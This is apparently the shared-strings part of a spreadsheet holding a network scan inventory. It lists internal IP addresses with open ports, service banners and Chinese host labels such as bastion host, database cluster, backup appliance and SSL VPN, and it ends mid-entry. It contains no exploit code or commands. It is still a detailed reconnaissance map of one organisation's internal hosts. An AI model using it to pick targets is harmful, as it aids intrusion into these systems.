  <si>
    <t>MinIO-Console,Cockpit</t>
  </si>
  <si>
    <t>172.20.34.72</t>
  </si>
  <si>
    <t>172.20.34.74</t>
  </si>
  <si>
    <t>成都超融合集群地址</t>
  </si>
  <si>
    <t>172.20.34.20</t>
  </si>
  <si>
    <t>ssl(22001,22011,443,22041,4480,23031,23020,22010)
http(80)
ssh(22)
iscsi(3260)</t>
  </si>
  <si>
    <t>成都物理服务器一起生活餐饮系统</t>
  </si>
  <si>
    <t>172.20.34.95</t>
  </si>
  <si>
    <t>ajp13(8009)
ms-sql-s(1433)
ms-wbt-server(3389)
mysql(3306)
ftp(10083)
http(5985,80,47001,10082,8080)
ms-olap4(2383)
msrpc(49155,49216,49153,135,49156,49219,49154,49152)
netbios-ssn(139)
microsoft-ds(445)
tcpwrapped(10050)</t>
  </si>
  <si>
    <t>Apache Jserv
Microsoft-HTTPAPI 2.0
indy</t>
  </si>
  <si>
    <t>172.20.34.17</t>
  </si>
  <si>
    <t>172.20.34.85</t>
  </si>
  <si>
    <t>ncacn_http(593,3388)
ms-wbt-server(3389)
http(80,5985,47001,15000,6445,6444)
netbios-ssn(139)
nsjtp-data(1688)
microsoft-ds(445)
ssl(443)
msrpc(49707,49691,49665,49671,49666,135,49669,5504,49668,49664,49679,49693,49672)</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI 2.0
Now
Microsoft IIS httpd 10.0
Microsoft IIS httpd</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI,Microsoft IIS httpd,Now</t>
  </si>
  <si>
    <t>成都备份一体机业务ip</t>
  </si>
  <si>
    <t>172.20.34.110</t>
  </si>
  <si>
    <t>unknown(50051)
d-data(4301)
dey-sapi(4330)
ssh(22)
mysql(3306)
tcpwrapped(4488,4388)
mountd(20048)
pscl-mgt(4312)
ds-srvr(4401)
grpc(50053,50052)
ds-clnt(4402)
pinghgl(4306)
d-data-control(4302)
nfs_acl(2049)
redis(6379)
batman(4305)
http(9980,9981,8180,8280)
rpcbind(111)</t>
  </si>
  <si>
    <t>SAXA</t>
  </si>
  <si>
    <t>成都数据中心监控</t>
  </si>
  <si>
    <t>172.20.34.125</t>
  </si>
  <si>
    <t>http(80)
rtsp(554)
hikvision-nvr(8000)</t>
  </si>
  <si>
    <t>深大中间层-商餐服务器</t>
  </si>
  <si>
    <t>172.20.34.80</t>
  </si>
  <si>
    <t>3107314031</t>
  </si>
  <si>
    <t>msrpc(49665,49666,49700,135,49668,49664,49693,49667)
ms-wbt-server(3389)
914c-g(211)
netbios-ssn(139)
http(5985,47001,19850,8085,8120,8059,80,8121,8090)
microsoft-ds(445)
tcpwrapped(10050)
anet(212)
ftp(21)</t>
  </si>
  <si>
    <t>成都备份一体机远程控制卡</t>
  </si>
  <si>
    <t>172.20.34.120</t>
  </si>
  <si>
    <t>Bootstrap(Angular)</t>
  </si>
  <si>
    <t>成都超融合交换机</t>
  </si>
  <si>
    <t>172.20.34.15</t>
  </si>
  <si>
    <t>172.20.34.79</t>
  </si>
  <si>
    <t>msrpc(2105,49665,49671,135,49669,49668,49664,2103,49696,49667,49695,2107)
http(39,80,8881,8030,5985,19081,9000,47001,10082,8099,8092,19080)
ms-wbt-server(3389)
msmq(1801)
netbios-ssn(139)
ftp(10083)
microsoft-ds(445)
tcpwrapped(21,10050)
intu-ec-svcdisc(8020)</t>
  </si>
  <si>
    <t>nginx
Microsoft-HTTPAPI 2.0
indy
Apache-Tomcat
Microsoft IIS httpd</t>
  </si>
  <si>
    <t>ASP.NET-MVC(jQuery)(Bootstrap)
Spring-Framework
Bootstrap(jQuery)(ASP.NET-MVC)</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI,Microsoft IIS httpd,indy,Apache-Tomcat</t>
  </si>
  <si>
    <t>172.20.34.106</t>
  </si>
  <si>
    <t>http(5985,6444)
ms-wbt-server(3389)</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI 2.0
Now</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI,Now</t>
  </si>
  <si>
    <t>172.20.34.140</t>
  </si>
  <si>
    <t>cleverdetect(6690)
grpc(3265)
netbios-ssn(139,445)
http(5000,5357,80)
iscsi(3261,3263,3264)
ssl(443)
https(5001)</t>
  </si>
  <si>
    <t>VUE framework(nginx)
nginx</t>
  </si>
  <si>
    <t>ExtJS</t>
  </si>
  <si>
    <t>Synology-network attached storage</t>
  </si>
  <si>
    <t>Synology Inc.</t>
  </si>
  <si>
    <t>成都漏扫工具TSS</t>
  </si>
  <si>
    <t>172.20.34.199</t>
  </si>
  <si>
    <t>172.20.37.105</t>
  </si>
  <si>
    <t>pop3(110)</t>
  </si>
  <si>
    <t>172.20.35.8</t>
  </si>
  <si>
    <t>microsoft-ds(445)
netbios-ssn(139)
http(5357)
vnc(5900)
msrpc(49665,49714,49664,49667,49666,49676,135,49668)</t>
  </si>
  <si>
    <t>深大中间层-闸机服务器</t>
  </si>
  <si>
    <t>172.20.34.78</t>
  </si>
  <si>
    <t>1421016979</t>
  </si>
  <si>
    <t>http(5985,47001,80,8019,9994,8017,9992,9190,9993,6000,9991,9995,9996)
ms-wbt-server(3389)
dec-notes(3333)
msrpc(49665,49666,135,49683,49664,49670,49696,49667)
914c-g(211)
netbios-ssn(139)
ipx(213)
microsoft-ds(445)
ethernetip-1(2222)
anet(212)
tcpwrapped(10050)</t>
  </si>
  <si>
    <t>深大中间层-票务服务器</t>
  </si>
  <si>
    <t>172.20.34.70</t>
  </si>
  <si>
    <t>670410342</t>
  </si>
  <si>
    <t>http(39,80,8881,8030,5985,19081,9000,47001,10082,8099,19080)
intu-ec-svcdisc(8020)
dec-notes(3333)
ftp(21,10083)
netbios-ssn(139)
ethernetip-1(2222)
914c-g(211)
msmq(1801)
msrpc(2105,49665,49666,135,49669,49664,2103,49670,49689,49667,49694,2107)
microsoft-ds(445)
tcpwrapped(10050)
anet(212)
ms-wbt-server(3389)</t>
  </si>
  <si>
    <t>172.20.37.108</t>
  </si>
  <si>
    <t>172.20.37.102</t>
  </si>
  <si>
    <t>172.20.37.119</t>
  </si>
  <si>
    <t>172.20.37.109</t>
  </si>
  <si>
    <t>成都堡垒机</t>
  </si>
  <si>
    <t>172.20.34.10</t>
  </si>
  <si>
    <t>ssh(12024)
ms-wbt-server(12025)
ssl(443)
unknown(12020)</t>
  </si>
  <si>
    <t>172.20.37.134</t>
  </si>
  <si>
    <t>172.20.37.120</t>
  </si>
  <si>
    <t>172.20.37.107</t>
  </si>
  <si>
    <t>172.20.37.106</t>
  </si>
  <si>
    <t>172.20.37.127</t>
  </si>
  <si>
    <t>172.20.35.240</t>
  </si>
  <si>
    <t>172.20.37.117</t>
  </si>
  <si>
    <t>172.20.37.132</t>
  </si>
  <si>
    <t>172.20.37.121</t>
  </si>
  <si>
    <t>172.20.37.115</t>
  </si>
  <si>
    <t>172.20.37.133</t>
  </si>
  <si>
    <t>172.20.37.13</t>
  </si>
  <si>
    <t>172.20.37.112</t>
  </si>
  <si>
    <t>172.20.37.129</t>
  </si>
  <si>
    <t>172.20.37.11</t>
  </si>
  <si>
    <t>172.20.37.104</t>
  </si>
  <si>
    <t>172.20.37.100</t>
  </si>
  <si>
    <t>172.20.37.118</t>
  </si>
  <si>
    <t>172.20.37.116</t>
  </si>
  <si>
    <t>172.20.37.12</t>
  </si>
  <si>
    <t>172.20.37.101</t>
  </si>
  <si>
    <t>172.20.37.125</t>
  </si>
  <si>
    <t>172.20.37.10</t>
  </si>
  <si>
    <t>172.20.37.110</t>
  </si>
  <si>
    <t>172.20.37.130</t>
  </si>
  <si>
    <t>172.20.37.124</t>
  </si>
  <si>
    <t>172.20.37.111</t>
  </si>
  <si>
    <t>172.20.37.1</t>
  </si>
  <si>
    <t>172.20.37.113</t>
  </si>
  <si>
    <t>172.20.37.103</t>
  </si>
  <si>
    <t>172.20.37.135</t>
  </si>
  <si>
    <t>172.20.37.114</t>
  </si>
  <si>
    <t>172.20.37.122</t>
  </si>
  <si>
    <t>172.20.37.0</t>
  </si>
  <si>
    <t>172.20.37.126</t>
  </si>
  <si>
    <t>172.20.37.131</t>
  </si>
  <si>
    <t>172.20.37.128</t>
  </si>
  <si>
    <t>172.20.37.123</t>
  </si>
  <si>
    <t>172.20.37.27</t>
  </si>
  <si>
    <t>smtp(25)</t>
  </si>
  <si>
    <t>172.20.39.118</t>
  </si>
  <si>
    <t>172.20.39.117</t>
  </si>
  <si>
    <t>172.20.37.48</t>
  </si>
  <si>
    <t>172.20.37.196</t>
  </si>
  <si>
    <t>172.20.37.254</t>
  </si>
  <si>
    <t>172.20.37.224</t>
  </si>
  <si>
    <t>172.20.37.220</t>
  </si>
  <si>
    <t>172.20.37.212</t>
  </si>
  <si>
    <t>172.20.37.238</t>
  </si>
  <si>
    <t>172.20.37.171</t>
  </si>
  <si>
    <t>172.20.37.209</t>
  </si>
  <si>
    <t>172.20.37.233</t>
  </si>
  <si>
    <t>172.20.37.62</t>
  </si>
  <si>
    <t>172.20.37.188</t>
  </si>
  <si>
    <t>172.20.39.0</t>
  </si>
  <si>
    <t>172.20.37.26</t>
  </si>
  <si>
    <t>172.20.37.180</t>
  </si>
  <si>
    <t>172.20.37.70</t>
  </si>
  <si>
    <t>172.20.37.161</t>
  </si>
  <si>
    <t>172.20.37.153</t>
  </si>
  <si>
    <t>172.20.37.250</t>
  </si>
  <si>
    <t>172.20.37.251</t>
  </si>
  <si>
    <t>172.20.37.215</t>
  </si>
  <si>
    <t>172.20.39.103</t>
  </si>
  <si>
    <t>172.20.37.94</t>
  </si>
  <si>
    <t>172.20.37.145</t>
  </si>
  <si>
    <t>172.20.39.127</t>
  </si>
  <si>
    <t>172.20.37.55</t>
  </si>
  <si>
    <t>172.20.39.102</t>
  </si>
  <si>
    <t>172.20.37.206</t>
  </si>
  <si>
    <t>172.20.37.43</t>
  </si>
  <si>
    <t>172.20.37.198</t>
  </si>
  <si>
    <t>172.20.37.28</t>
  </si>
  <si>
    <t>172.20.37.50</t>
  </si>
  <si>
    <t>172.20.37.141</t>
  </si>
  <si>
    <t>172.20.37.185</t>
  </si>
  <si>
    <t>172.20.37.228</t>
  </si>
  <si>
    <t>172.20.39.129</t>
  </si>
  <si>
    <t>172.20.37.168</t>
  </si>
  <si>
    <t>172.20.37.239</t>
  </si>
  <si>
    <t>172.20.37.235</t>
  </si>
  <si>
    <t>172.20.37.248</t>
  </si>
  <si>
    <t>172.20.39.1</t>
  </si>
  <si>
    <t>172.20.37.191</t>
  </si>
  <si>
    <t>172.20.37.225</t>
  </si>
  <si>
    <t>172.20.37.44</t>
  </si>
  <si>
    <t>172.20.37.9</t>
  </si>
  <si>
    <t>172.20.37.7</t>
  </si>
  <si>
    <t>172.20.37.202</t>
  </si>
  <si>
    <t>172.20.37.234</t>
  </si>
  <si>
    <t>172.20.37.192</t>
  </si>
  <si>
    <t>172.20.37.176</t>
  </si>
  <si>
    <t>172.20.37.4</t>
  </si>
  <si>
    <t>172.20.37.164</t>
  </si>
  <si>
    <t>172.20.37.159</t>
  </si>
  <si>
    <t>172.20.37.150</t>
  </si>
  <si>
    <t>172.20.37.229</t>
  </si>
  <si>
    <t>172.20.37.216</t>
  </si>
  <si>
    <t>172.20.37.181</t>
  </si>
  <si>
    <t>172.20.37.23</t>
  </si>
  <si>
    <t>172.20.39.108</t>
  </si>
  <si>
    <t>172.20.37.237</t>
  </si>
  <si>
    <t>172.20.37.89</t>
  </si>
  <si>
    <t>172.20.37.214</t>
  </si>
  <si>
    <t>172.20.37.74</t>
  </si>
  <si>
    <t>172.20.37.205</t>
  </si>
  <si>
    <t>172.20.37.29</t>
  </si>
  <si>
    <t>172.20.37.172</t>
  </si>
  <si>
    <t>172.20.37.151</t>
  </si>
  <si>
    <t>172.20.37.136</t>
  </si>
  <si>
    <t>172.20.37.86</t>
  </si>
  <si>
    <t>172.20.37.152</t>
  </si>
  <si>
    <t>172.20.37.45</t>
  </si>
  <si>
    <t>172.20.37.156</t>
  </si>
  <si>
    <t>172.20.37.231</t>
  </si>
  <si>
    <t>172.20.37.174</t>
  </si>
  <si>
    <t>172.20.39.113</t>
  </si>
  <si>
    <t>172.20.37.73</t>
  </si>
  <si>
    <t>172.20.39.106</t>
  </si>
  <si>
    <t>172.20.37.138</t>
  </si>
  <si>
    <t>172.20.37.175</t>
  </si>
  <si>
    <t>172.20.37.59</t>
  </si>
  <si>
    <t>172.20.37.35</t>
  </si>
  <si>
    <t>172.20.37.36</t>
  </si>
  <si>
    <t>172.20.37.137</t>
  </si>
  <si>
    <t>172.20.37.193</t>
  </si>
  <si>
    <t>172.20.37.41</t>
  </si>
  <si>
    <t>172.20.39.135</t>
  </si>
  <si>
    <t>172.20.37.42</t>
  </si>
  <si>
    <t>172.20.37.241</t>
  </si>
  <si>
    <t>172.20.37.221</t>
  </si>
  <si>
    <t>172.20.37.99</t>
  </si>
  <si>
    <t>172.20.37.92</t>
  </si>
  <si>
    <t>172.20.37.218</t>
  </si>
  <si>
    <t>172.20.37.217</t>
  </si>
  <si>
    <t>172.20.37.178</t>
  </si>
  <si>
    <t>172.20.37.52</t>
  </si>
  <si>
    <t>172.20.37.158</t>
  </si>
  <si>
    <t>172.20.39.121</t>
  </si>
  <si>
    <t>172.20.39.13</t>
  </si>
  <si>
    <t>172.20.37.14</t>
  </si>
  <si>
    <t>172.20.39.126</t>
  </si>
  <si>
    <t>172.20.37.85</t>
  </si>
  <si>
    <t>172.20.39.134</t>
  </si>
  <si>
    <t>172.20.37.49</t>
  </si>
  <si>
    <t>172.20.37.53</t>
  </si>
  <si>
    <t>172.20.37.83</t>
  </si>
  <si>
    <t>172.20.37.244</t>
  </si>
  <si>
    <t>172.20.37.91</t>
  </si>
  <si>
    <t>172.20.37.177</t>
  </si>
  <si>
    <t>172.20.37.3</t>
  </si>
  <si>
    <t>172.20.37.162</t>
  </si>
  <si>
    <t>172.20.37.5</t>
  </si>
  <si>
    <t>172.20.37.243</t>
  </si>
  <si>
    <t>172.20.37.247</t>
  </si>
  <si>
    <t>172.20.37.163</t>
  </si>
  <si>
    <t>172.20.37.211</t>
  </si>
  <si>
    <t>172.20.37.58</t>
  </si>
  <si>
    <t>172.20.37.65</t>
  </si>
  <si>
    <t>172.20.39.100</t>
  </si>
  <si>
    <t>172.20.37.245</t>
  </si>
  <si>
    <t>172.20.37.30</t>
  </si>
  <si>
    <t>172.20.39.114</t>
  </si>
  <si>
    <t>172.20.37.252</t>
  </si>
  <si>
    <t>172.20.37.75</t>
  </si>
  <si>
    <t>172.20.37.97</t>
  </si>
  <si>
    <t>172.20.39.124</t>
  </si>
  <si>
    <t>172.20.37.63</t>
  </si>
  <si>
    <t>172.20.37.236</t>
  </si>
  <si>
    <t>172.20.39.11</t>
  </si>
  <si>
    <t>172.20.37.173</t>
  </si>
  <si>
    <t>172.20.37.78</t>
  </si>
  <si>
    <t>172.20.37.87</t>
  </si>
  <si>
    <t>172.20.37.189</t>
  </si>
  <si>
    <t>172.20.37.204</t>
  </si>
  <si>
    <t>172.20.37.64</t>
  </si>
  <si>
    <t>172.20.37.208</t>
  </si>
  <si>
    <t>172.20.37.47</t>
  </si>
  <si>
    <t>172.20.37.84</t>
  </si>
  <si>
    <t>172.20.37.253</t>
  </si>
  <si>
    <t>172.20.37.22</t>
  </si>
  <si>
    <t>172.20.37.98</t>
  </si>
  <si>
    <t>172.20.37.40</t>
  </si>
  <si>
    <t>172.20.37.33</t>
  </si>
  <si>
    <t>172.20.37.140</t>
  </si>
  <si>
    <t>172.20.37.227</t>
  </si>
  <si>
    <t>172.20.37.18</t>
  </si>
  <si>
    <t>172.20.39.111</t>
  </si>
  <si>
    <t>172.20.39.133</t>
  </si>
  <si>
    <t>172.20.37.95</t>
  </si>
  <si>
    <t>172.20.37.226</t>
  </si>
  <si>
    <t>172.20.39.112</t>
  </si>
  <si>
    <t>172.20.39.119</t>
  </si>
  <si>
    <t>172.20.37.170</t>
  </si>
  <si>
    <t>172.20.37.144</t>
  </si>
  <si>
    <t>172.20.37.187</t>
  </si>
  <si>
    <t>172.20.37.157</t>
  </si>
  <si>
    <t>172.20.37.190</t>
  </si>
  <si>
    <t>172.20.37.32</t>
  </si>
  <si>
    <t>172.20.37.8</t>
  </si>
  <si>
    <t>172.20.39.10</t>
  </si>
  <si>
    <t>172.20.39.104</t>
  </si>
  <si>
    <t>172.20.37.54</t>
  </si>
  <si>
    <t>172.20.39.122</t>
  </si>
  <si>
    <t>172.20.37.199</t>
  </si>
  <si>
    <t>172.20.37.71</t>
  </si>
  <si>
    <t>172.20.37.15</t>
  </si>
  <si>
    <t>172.20.37.39</t>
  </si>
  <si>
    <t>172.20.39.110</t>
  </si>
  <si>
    <t>172.20.37.90</t>
  </si>
  <si>
    <t>172.20.37.143</t>
  </si>
  <si>
    <t>172.20.37.76</t>
  </si>
  <si>
    <t>172.20.37.81</t>
  </si>
  <si>
    <t>172.20.37.25</t>
  </si>
  <si>
    <t>172.20.39.131</t>
  </si>
  <si>
    <t>172.20.37.51</t>
  </si>
  <si>
    <t>172.20.39.107</t>
  </si>
  <si>
    <t>172.20.37.232</t>
  </si>
  <si>
    <t>172.20.37.56</t>
  </si>
  <si>
    <t>172.20.37.19</t>
  </si>
  <si>
    <t>172.20.37.69</t>
  </si>
  <si>
    <t>172.20.37.169</t>
  </si>
  <si>
    <t>172.20.37.57</t>
  </si>
  <si>
    <t>172.20.37.147</t>
  </si>
  <si>
    <t>172.20.39.105</t>
  </si>
  <si>
    <t>172.20.39.123</t>
  </si>
  <si>
    <t>172.20.39.125</t>
  </si>
  <si>
    <t>172.20.39.12</t>
  </si>
  <si>
    <t>172.20.37.37</t>
  </si>
  <si>
    <t>172.20.37.255</t>
  </si>
  <si>
    <t>172.20.37.183</t>
  </si>
  <si>
    <t>172.20.37.182</t>
  </si>
  <si>
    <t>172.20.37.17</t>
  </si>
  <si>
    <t>172.20.37.149</t>
  </si>
  <si>
    <t>172.20.39.115</t>
  </si>
  <si>
    <t>172.20.37.194</t>
  </si>
  <si>
    <t>172.20.37.66</t>
  </si>
  <si>
    <t>172.20.37.197</t>
  </si>
  <si>
    <t>172.20.37.139</t>
  </si>
  <si>
    <t>172.20.39.109</t>
  </si>
  <si>
    <t>172.20.37.24</t>
  </si>
  <si>
    <t>172.20.39.116</t>
  </si>
  <si>
    <t>172.20.37.207</t>
  </si>
  <si>
    <t>172.20.37.179</t>
  </si>
  <si>
    <t>172.20.37.154</t>
  </si>
  <si>
    <t>172.20.37.155</t>
  </si>
  <si>
    <t>172.20.37.34</t>
  </si>
  <si>
    <t>172.20.37.200</t>
  </si>
  <si>
    <t>172.20.37.230</t>
  </si>
  <si>
    <t>172.20.37.222</t>
  </si>
  <si>
    <t>172.20.37.249</t>
  </si>
  <si>
    <t>172.20.39.132</t>
  </si>
  <si>
    <t>172.20.37.2</t>
  </si>
  <si>
    <t>172.20.37.160</t>
  </si>
  <si>
    <t>172.20.39.130</t>
  </si>
  <si>
    <t>172.20.37.67</t>
  </si>
  <si>
    <t>172.20.37.46</t>
  </si>
  <si>
    <t>172.20.37.80</t>
  </si>
  <si>
    <t>172.20.37.186</t>
  </si>
  <si>
    <t>172.20.37.68</t>
  </si>
  <si>
    <t>172.20.37.38</t>
  </si>
  <si>
    <t>172.20.37.242</t>
  </si>
  <si>
    <t>172.20.37.60</t>
  </si>
  <si>
    <t>172.20.37.146</t>
  </si>
  <si>
    <t>172.20.37.82</t>
  </si>
  <si>
    <t>172.20.37.165</t>
  </si>
  <si>
    <t>172.20.39.128</t>
  </si>
  <si>
    <t>172.20.37.6</t>
  </si>
  <si>
    <t>172.20.39.120</t>
  </si>
  <si>
    <t>172.20.39.101</t>
  </si>
  <si>
    <t>172.20.37.93</t>
  </si>
  <si>
    <t>172.20.37.96</t>
  </si>
  <si>
    <t>172.20.37.219</t>
  </si>
  <si>
    <t>172.20.37.203</t>
  </si>
  <si>
    <t>172.20.37.195</t>
  </si>
  <si>
    <t>172.20.37.88</t>
  </si>
  <si>
    <t>172.20.37.201</t>
  </si>
  <si>
    <t>172.20.37.21</t>
  </si>
  <si>
    <t>172.20.37.240</t>
  </si>
  <si>
    <t>172.20.37.167</t>
  </si>
  <si>
    <t>172.20.37.213</t>
  </si>
  <si>
    <t>172.20.37.16</t>
  </si>
  <si>
    <t>172.20.37.246</t>
  </si>
  <si>
    <t>172.20.37.20</t>
  </si>
  <si>
    <t>172.20.37.166</t>
  </si>
  <si>
    <t>172.20.37.184</t>
  </si>
  <si>
    <t>172.20.37.77</t>
  </si>
  <si>
    <t>172.20.37.148</t>
  </si>
  <si>
    <t>172.20.37.72</t>
  </si>
  <si>
    <t>172.20.37.223</t>
  </si>
  <si>
    <t>172.20.37.61</t>
  </si>
  <si>
    <t>172.20.37.31</t>
  </si>
  <si>
    <t>172.20.37.210</t>
  </si>
  <si>
    <t>172.20.37.79</t>
  </si>
  <si>
    <t>172.20.37.142</t>
  </si>
  <si>
    <t>192.168.1.19</t>
  </si>
  <si>
    <t>unknown(47545,9013)
tcpwrapped(8610)
ssl(443,10443,47547)
http(80,631)
printer(515)
ogs-client(9007)</t>
  </si>
  <si>
    <t>CANON-HTTP-Server</t>
  </si>
  <si>
    <t>青岛项目中豪闸机应用服务器</t>
  </si>
  <si>
    <t>192.168.1.110</t>
  </si>
  <si>
    <t>2775753375</t>
  </si>
  <si>
    <t>msgsrvr(8787)
http(80)
tcpwrapped(443)
ssh(22)
ssl(8789)</t>
  </si>
  <si>
    <t>192.168.1.134</t>
  </si>
  <si>
    <t>SimpleDNSPlus,Ruijie-Switch</t>
  </si>
  <si>
    <t>192.168.1.143</t>
  </si>
  <si>
    <t>192.168.1.64</t>
  </si>
  <si>
    <t>vmware-auth(912)
ms-wbt-server(3389)
http(5357,6973)
nagios-nsca(902)
netbios-ssn(139)
msrpc(1063,1027,1078,1399,135,1025,1026,1029)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>zabbix代理服务器-成都</t>
  </si>
  <si>
    <t>192.168.9.220</t>
  </si>
  <si>
    <t>3823564460</t>
  </si>
  <si>
    <t>ssh(22)
mysql(3306)
ssl(10051)
rpcbind(111)
mysqlx(33060)
tcpwrapped(10050)</t>
  </si>
  <si>
    <t>青岛ARS6300-超融合交换机</t>
  </si>
  <si>
    <t>192.168.1.123</t>
  </si>
  <si>
    <t>http(80)
telnet(23)
tcpwrapped(53)</t>
  </si>
  <si>
    <t>Router-Web-Config-System</t>
  </si>
  <si>
    <t>192.168.1.66</t>
  </si>
  <si>
    <t>unknown(31318,5040)
ms-wbt-server(3389)
msrpc(1098,49665,49666,135,1025,49669,49664,1042,49667)
http(5357,5130)
netbios-ssn(139)
vmware-auth(902,912)
microsoft-ds(445)
ssl(443)</t>
  </si>
  <si>
    <t>192.168.1.130</t>
  </si>
  <si>
    <t>192.168.1.120</t>
  </si>
  <si>
    <t>http(5357)
netbios-ssn(139)
msrpc(49665,49664,49667,49666,135,49669,55977,49670)
tcpwrapped(19531)
unknown(5040)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>192.168.1.73</t>
  </si>
  <si>
    <t>microsoft-ds(445)
msrpc(49665,49664,49666,135,49708,49669,49668,49670)
netbios-ssn(139)
unknown(54644,5040)
http(5357)</t>
  </si>
  <si>
    <t>192.168.1.248</t>
  </si>
  <si>
    <t>ms-olap4(2383)
ms-sql-s(49159)
msrpc(49155,49153,49193,49200,49154,49152,49156)
http(80,5985,47001)</t>
  </si>
  <si>
    <t>Microsoft IIS httpd 8.5
Microsoft-HTTPAPI 2.0</t>
  </si>
  <si>
    <t>青岛ssl vpn</t>
  </si>
  <si>
    <t>192.168.1.4</t>
  </si>
  <si>
    <t>http(80)
printer(515)
unknown(47545,9013)
ogs-client(9007)</t>
  </si>
  <si>
    <t>192.168.1.222</t>
  </si>
  <si>
    <t>http(80)
domain(53)
daap(631)
unknown(17625)</t>
  </si>
  <si>
    <t>172.20.39.22</t>
  </si>
  <si>
    <t>172.20.39.16</t>
  </si>
  <si>
    <t>172.20.39.2</t>
  </si>
  <si>
    <t>172.20.39.18</t>
  </si>
  <si>
    <t>172.20.39.9</t>
  </si>
  <si>
    <t>192.168.1.18</t>
  </si>
  <si>
    <t>ms-sql-s(1433)
ms-wbt-server(3389)
ms-olap4(2383)
netbios-ssn(139)
msrpc(49155,49156,49153,135,47546,49157,49154,49152)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>SQL Server 2005</t>
  </si>
  <si>
    <t>172.20.39.8</t>
  </si>
  <si>
    <t>172.20.39.26</t>
  </si>
  <si>
    <t>172.20.39.235</t>
  </si>
  <si>
    <t>imap(143)</t>
  </si>
  <si>
    <t>172.20.39.250</t>
  </si>
  <si>
    <t>成都老物理数据库服务器3</t>
  </si>
  <si>
    <t>192.168.9.240</t>
  </si>
  <si>
    <t>531526629</t>
  </si>
  <si>
    <t>oracle-tns(1521,64687)
tcpwrapped(10050)
rpcbind(111)
ssh(22)
status(14767)</t>
  </si>
  <si>
    <t>172.20.39.215</t>
  </si>
  <si>
    <t>172.20.39.213</t>
  </si>
  <si>
    <t>172.20.39.249</t>
  </si>
  <si>
    <t>172.20.39.212</t>
  </si>
  <si>
    <t>数据库服务器1（超融合机器）</t>
  </si>
  <si>
    <t>192.168.9.20</t>
  </si>
  <si>
    <t>3594501019</t>
  </si>
  <si>
    <t>tcpwrapped(36719,1521,10050,20736,111,22)</t>
  </si>
  <si>
    <t>172.20.39.239</t>
  </si>
  <si>
    <t>成都数据库集群vip</t>
  </si>
  <si>
    <t>192.168.9.200</t>
  </si>
  <si>
    <t>172.20.39.180</t>
  </si>
  <si>
    <t>172.20.39.236</t>
  </si>
  <si>
    <t>tcpwrapped(143)</t>
  </si>
  <si>
    <t>172.20.39.61</t>
  </si>
  <si>
    <t>172.20.39.97</t>
  </si>
  <si>
    <t>172.20.39.217</t>
  </si>
  <si>
    <t>172.20.39.172</t>
  </si>
  <si>
    <t>172.20.39.150</t>
  </si>
  <si>
    <t>172.20.39.58</t>
  </si>
  <si>
    <t>172.20.39.37</t>
  </si>
  <si>
    <t>172.20.39.243</t>
  </si>
  <si>
    <t>172.20.39.253</t>
  </si>
  <si>
    <t>172.20.39.210</t>
  </si>
  <si>
    <t>172.20.39.218</t>
  </si>
  <si>
    <t>172.20.39.141</t>
  </si>
  <si>
    <t>172.20.39.60</t>
  </si>
  <si>
    <t>172.20.39.145</t>
  </si>
  <si>
    <t>172.20.39.167</t>
  </si>
  <si>
    <t>172.20.39.214</t>
  </si>
  <si>
    <t>172.20.39.153</t>
  </si>
  <si>
    <t>172.20.39.33</t>
  </si>
  <si>
    <t>192.168.1.177</t>
  </si>
  <si>
    <t>172.20.39.179</t>
  </si>
  <si>
    <t>172.20.39.67</t>
  </si>
  <si>
    <t>172.20.39.221</t>
  </si>
  <si>
    <t>172.20.39.46</t>
  </si>
  <si>
    <t>172.20.39.219</t>
  </si>
  <si>
    <t>172.20.39.28</t>
  </si>
  <si>
    <t>192.168.1.241</t>
  </si>
  <si>
    <t>172.20.39.66</t>
  </si>
  <si>
    <t>172.20.39.183</t>
  </si>
  <si>
    <t>172.20.39.186</t>
  </si>
  <si>
    <t>172.20.39.199</t>
  </si>
  <si>
    <t>172.20.39.247</t>
  </si>
  <si>
    <t>172.20.39.188</t>
  </si>
  <si>
    <t>172.20.39.42</t>
  </si>
  <si>
    <t>172.20.39.98</t>
  </si>
  <si>
    <t>172.20.39.155</t>
  </si>
  <si>
    <t>172.20.39.43</t>
  </si>
  <si>
    <t>172.20.39.40</t>
  </si>
  <si>
    <t>172.20.39.140</t>
  </si>
  <si>
    <t>172.20.39.136</t>
  </si>
  <si>
    <t>172.20.39.78</t>
  </si>
  <si>
    <t>172.20.39.142</t>
  </si>
  <si>
    <t>172.20.39.35</t>
  </si>
  <si>
    <t>172.20.39.222</t>
  </si>
  <si>
    <t>172.20.39.165</t>
  </si>
  <si>
    <t>172.20.39.83</t>
  </si>
  <si>
    <t>172.20.39.238</t>
  </si>
  <si>
    <t>172.20.39.88</t>
  </si>
  <si>
    <t>172.20.39.246</t>
  </si>
  <si>
    <t>172.20.39.75</t>
  </si>
  <si>
    <t>172.20.39.50</t>
  </si>
  <si>
    <t>172.20.39.146</t>
  </si>
  <si>
    <t>172.20.39.94</t>
  </si>
  <si>
    <t>172.20.39.232</t>
  </si>
  <si>
    <t>172.20.39.233</t>
  </si>
  <si>
    <t>172.20.39.93</t>
  </si>
  <si>
    <t>192.168.1.232</t>
  </si>
  <si>
    <t>172.20.39.99</t>
  </si>
  <si>
    <t>172.20.39.245</t>
  </si>
  <si>
    <t>172.20.39.38</t>
  </si>
  <si>
    <t>172.20.39.198</t>
  </si>
  <si>
    <t>192.168.1.131</t>
  </si>
  <si>
    <t>172.20.39.64</t>
  </si>
  <si>
    <t>172.20.39.168</t>
  </si>
  <si>
    <t>172.20.39.47</t>
  </si>
  <si>
    <t>192.168.1.79</t>
  </si>
  <si>
    <t>172.20.39.230</t>
  </si>
  <si>
    <t>172.20.39.241</t>
  </si>
  <si>
    <t>172.20.39.149</t>
  </si>
  <si>
    <t>172.20.39.203</t>
  </si>
  <si>
    <t>172.20.39.237</t>
  </si>
  <si>
    <t>172.20.39.80</t>
  </si>
  <si>
    <t>192.168.1.126</t>
  </si>
  <si>
    <t>172.20.39.56</t>
  </si>
  <si>
    <t>172.20.39.52</t>
  </si>
  <si>
    <t>172.20.39.71</t>
  </si>
  <si>
    <t>172.20.39.151</t>
  </si>
  <si>
    <t>172.20.39.25</t>
  </si>
  <si>
    <t>172.20.39.31</t>
  </si>
  <si>
    <t>172.20.39.69</t>
  </si>
  <si>
    <t>172.20.39.242</t>
  </si>
  <si>
